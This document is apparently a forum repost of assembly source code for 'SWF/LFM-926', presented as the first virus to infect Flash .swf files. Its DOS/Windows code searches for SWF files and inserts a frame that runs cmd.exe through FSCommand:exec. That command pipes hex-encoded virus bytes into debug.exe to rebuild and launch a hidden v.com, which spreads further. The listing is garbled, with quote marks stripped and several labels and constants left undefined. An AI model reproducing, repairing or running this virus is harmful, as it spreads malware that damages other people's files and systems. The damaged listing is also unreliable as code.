  • 国外的第一只[感染*.swf]flash病毒的源代码

    SWF/LFM-926 Virus:
    ; ------------------
    ; Description: WinNT/XP Virus dropper for Flash .SWF files!
    ; Masm Version 6.11: ML.EXE SWF.ASM
    ; Virus Size: 926 bytes
    ; Infection Size: 3247 bytes.
    ; Last Edit: 01/08/2002

    ; --------------------------------- Begin Source Code ------------------------------------

    .model tiny
    org 100h

    Entry: jmp Start

    VIR_SIZE equ Virus_End-Entry

    DTA db 128 dup(0) ; Offset DTA+30 = filename
    HANDLE dw ? ; Handle to host file
    PTR1 dd 0 ; Segment address of the created memory block
    PATH db "*.SWF",0 ; File mask
    BINARY db "v.com",0 ; Binary code
    HEX db "0123456789ABCDEF" ; Binary to hex

    ; Flash header block.
    ; -------------------
    SIGN_FW dw ? ; SWF file format
    SIGN_S db ?
    VERSION_NUM db ?
    FILE_LENGTH dw ?
    dw ?

    RECT_BUF db 20 dup(0) ; Header length is variable because the RECT region isnt static. ;(

    HDR_SIZE dw ? ; Holds the true header size!

    ; Start of Viral Frame 0.
    ; -----------------------
    Drop_BEGIN db 03fh,003h ; DoAction Tag(12) long format. Learn the bytecodes!
    dw 0
    db 083h ; ActionGetUrl Tag
    db FSCommand:exec
    db 000h
    db cmd.exe
    db 009h ; chr(9) is Flash code for a space character.
    db /c
    db 009h
    db echo
    db 009h
    db Loading.Flash.Movie...
    db &
    db (echo
    db 009h
    db n
    db 009h
    db v.com&echo
    db 009h
    db a
    db 009h
    db 100&
    Drop_BEGIN_SIZE equ $-Drop_BEGIN

    Drop_MIDDLE db echo
    db 009h
    db db
    db 009h
    db 71 dup(,) ; db XX,...,XX where XXs are viral hex codes.
    db &
    Drop_MIDDLE_SIZE equ $-Drop_MIDDLE

    Drop_END db &echo.&echo
    db 009h
    db rcx&echo
    db 009h
    db 39E ; Define hex 39E (VIR_SIZE) as a string. Changes if this code changes.
    db &echo
    db 009h
    db w&echo
    db 009h
    db q)|debug.exe>nul&start
    db 009h
    db /b
    db 009h
    db v.com
    db 000h ; StringEnd Tag
    Drop_END_SIZE equ $-Drop_END

    ; End of Viral Frame 0.
    ; ---------------------
    END_TAG db 001h ; Action code 0x01 = tagshowframe Tag

    mov ax,(VIR_SIZE+0fh)
    shr ax,4
    shl ax,1
    mov bx,ax ; Allocate (VirusSize*2)
    mov ah,4ah
    int 21h ; Resize block
    jc ExProg

    mov dx,offset DTA ; Set DTA operation
    mov ah,1ah
    int 21h

    mov cx,07h
    mov dx,offset PATH
    mov ah,4eh ; FindFirst
    int 21h
    jc ExProg
    jmp Infect
    mov dx,offset PATH
    mov ah,4fh ; FindNext
    int 21h
    jc ExProg
    jmp Infect
    mov ax,4301h ; Hide v.com
    mov cx,02h
    mov dx,offset BINARY
    int 21h

    mov ax,4c00h ; End program
    int 21h
    mov byte ptr DTA[30+12],$
    mov dx,offset (DTA+30)

    mov ax,3d02h ; Open host file
    int 21h
    jc ExProg

    mov [HANDLE],ax ; Save file handle

    mov ax,3f00h ; Read file Header
    mov dx,offset SIGN_FW
    mov bx,[HANDLE]
    int 21h
    jc ExProg

    cmp word ptr SIGN_FW,WF ; Check for a valid Flash SWF file.
    jne Cycle ; Try another file ...
    cmp byte ptr SIGN_S,S
    jne Cycle
    cmp byte ptr VERSION_NUM,099h ; Already infected?
    je Cycle

    mov cx,RECT_BUF_SIZE ; Search for the SetBackgroundColor Tag.
    xor di,di ; Seems to always exist directly after the header.
    next: cmp byte ptr RECT_BUF[di],043h
    jne not_found
    cmp byte ptr RECT_BUF[di+1],002h
    jne not_found
    jmp found
    inc di
    loop next
    jmp Cycle
    mov word ptr HDR_SIZE,STATIC_HDR_SIZE
    add word ptr HDR_SIZE,di ; Compute the header size

    mov ax,4200h ; Reset file ptr right after Flash header
    xor cx,cx
    mov dx,[HDR_SIZE]
    int 21h
    jc ExProg

    push bx
    mov ax,word ptr FILE_LENGTH
    add ax,15
    shr ax,4
    mov bx,ax
    mov ah,48h ; Allocate memory for target host file
    int 21h
    pop bx
    jc ExProg
    mov word ptr PTR1[2],ax ; Save pointer to allocated block

    mov cx,word ptr FILE_LENGTH
    sub cx,[HDR_SIZE]
    mov ah,3fh ; Read host file into memory block
    push ds
    lds dx,[PTR1]
    int 21h
    pop ds
    jc ExProg

    mov ax,4200h ; Reset file ptr to the middle code section
    xor cx,cx
    mov dx,[HDR_SIZE]
    add dx,Drop_BEGIN_SIZE
    int 21h
    jc ExProg

    ; The following code is a key technique. It simply converts the
    ; virus from binary to hex characters and then inserts them into the host
    ; using a standard format that DEBUG.EXE expects! Flash only really
    ; allows plain text, so this satisfies that condition.

    mov word ptr ACTION_LENGTH,(Drop_BEGIN_SIZE-9+Drop_END_SIZE)
    push bx
    mov cx,VIR_SIZE
    xor si,si
    xor di,di
    mov bx,offset HEX ; Convert 8-bit binary number to a string representing a hex humber
    mov al,byte ptr Entry[si]
    mov ah,al
    and al,00001111y
    mov Drop_MIDDLE[STATIC_HDR_SIZE+di+1],al
    shr ax,12
    mov Drop_MIDDLE[STATIC_HDR_SIZE+di],al
    inc si
    inc di
    inc di
    inc di
    mov ax,si
    mov bl,24 ; Debug.exe can handle at most 24 defined bytes on 1 line.
    div bl
    or ah,ah
    jnz cont
    push cx
    xor di,di
    add word ptr ACTION_LENGTH,Drop_MIDDLE_SIZE
    mov bx,[HANDLE] ; Write hex dump entry XX,...,XX
    mov dx,offset Drop_MIDDLE
    mov cx,Drop_MIDDLE_SIZE
    mov ax,4000h
    int 21h
    jc ExProg
    pop cx
    loop ToHex
    pop bx

    or di,di
    jz no_remainder

    mov dx,offset Drop_MIDDLE
    mov cx,di
    add cx,7 ; STATIC_HDR_SIZE-1
    add word ptr ACTION_LENGTH,cx
    mov ax,4000h ; Write remainder hex dump entry XX,...,XX
    int 21h
    jc ExProg

    mov dx,offset Drop_END
    mov cx,Drop_END_SIZE+1
    mov ax,4000h ; Write end code and end of frame tag(01) into host
    int 21h
    jc ExProg

    mov cx,word ptr FILE_LENGTH
    sub cx,[HDR_SIZE]
    mov ax,4000h ; Write host code directly after viral code.
    push ds
    lds dx,[PTR1]
    int 21h
    pop ds
    jc ExProg
    ; Patch the header with new viral values.
    mov cx,word ptr ACTION_LENGTH
    add cx,4
    mov word ptr TAG_LENGTH,cx
    add cx,6
    add word ptr FILE_LENGTH,cx ; Total file size increase = (TAG_LENGTH+6)
    ; Set infection marker
    mov byte ptr VERSION_NUM,099h

    mov di,[HDR_SIZE]
    inc word ptr [SIGN_FW+di-2] ; Increase Frame count by 1

    mov ax,4200h ; Re-wind to start of file
    xor cx,cx
    xor dx,dx
    int 21h
    jc ExProg

    mov dx,offset SIGN_FW
    mov cx,[HDR_SIZE]
    mov ax,4000h ; Write updated viral header
    int 21h
    jc ExProg

    mov dx,offset Drop_BEGIN
    mov cx,Drop_BEGIN_SIZE
    mov ax,4000h ; Write begin code into host
    int 21h
    jc ExProg

    mov ah,49h ; Free memory block
    mov es,word ptr PTR1[2]
    int 21h
    jc ExProg

    mov ax,3e00h ; Close file
    int 21h
    jc ExProg

    jmp Cycle ; DONE! Try to infect another.

    end Entry

